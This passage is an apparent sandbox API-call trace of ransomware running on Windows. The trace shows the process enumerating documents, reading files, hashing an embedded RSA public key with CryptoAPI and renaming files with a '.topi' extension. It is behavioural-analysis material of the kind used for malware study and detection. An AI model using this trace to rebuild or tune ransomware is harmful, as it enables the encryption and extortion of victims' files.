(lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.129] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18ef3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.129] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.130] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.130] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.130] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.130] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x18f19, lpOverlapped=0x0) returned 1 [0097.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.131] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.131] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.132] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.132] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.132] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.132] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.132] GetLastError () returned 0x0 [0097.132] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.132] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.132] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.132] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.132] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.132] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.132] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18f20) returned 0x9a06a00 [0097.133] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.133] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.133] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.134] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\zaZpqRQJk0\\CzHlo-7HJSHrYESuwSG.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\zazpqrqjk0\\czhlo-7hjshryesuwsg.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\zaZpqRQJk0\\CzHlo-7HJSHrYESuwSG.pps.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\zazpqrqjk0\\czhlo-7hjshryesuwsg.pps.topi")) returned 1 [0097.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.135] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.135] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.136] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x766b58 | out: hHeap=0x680000) returned 1 [0097.136] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c68fdd0, ftCreationTime.dwHighDateTime=0x1d5b6ba, ftLastAccessTime.dwLowDateTime=0xe9714ec0, ftLastAccessTime.dwHighDateTime=0x1d5bd2e, ftLastWriteTime.dwLowDateTime=0xe9714ec0, ftLastWriteTime.dwHighDateTime=0x1d5bd2e, nFileSizeHigh=0x0, nFileSizeLow=0x1393d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UsNmJ.doc", cAlternateFileName="")) returned 1 [0097.136] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\zaZpqRQJk0\\UsNmJ.doc") returned=".doc" [0097.137] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\zaZpqRQJk0\\UsNmJ.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\zazpqrqjk0\\usnmj.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.137] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=80189) returned 1 [0097.137] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.140] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x13917, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.140] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.142] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.143] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.143] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.143] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.143] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.143] GetLastError () returned 0x0 [0097.143] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.143] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.143] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.143] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.143] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.143] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.143] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x13940) returned 0x9a06a00 [0097.144] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.144] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.144] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a031b8 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c88 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03200 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ca0 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4cd0 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ce8 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.145] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4cd0 | out: hHeap=0x680000) returned 1 [0097.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ce8 | out: hHeap=0x680000) returned 1 [0097.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.145] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4ce8 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4cd0 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.145] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ce8 | out: hHeap=0x680000) returned 1 [0097.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4cd0 | out: hHeap=0x680000) returned 1 [0097.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0097.146] GetCurrentThreadId () returned 0x8c4 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f90c0 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.146] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.146] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.147] GetCurrentThreadId () returned 0x8c4 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4cd0 [0097.147] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.147] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ce8 [0097.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4cb8 [0097.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4d00 [0097.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0097.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.148] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.148] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4cd0 | out: hHeap=0x680000) returned 1 [0097.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4cd0 [0097.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0097.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0097.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4cd0 | out: hHeap=0x680000) returned 1 [0097.149] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.149] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.150] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d00 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ce8 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4cb8 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ca0 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03200 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.150] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: 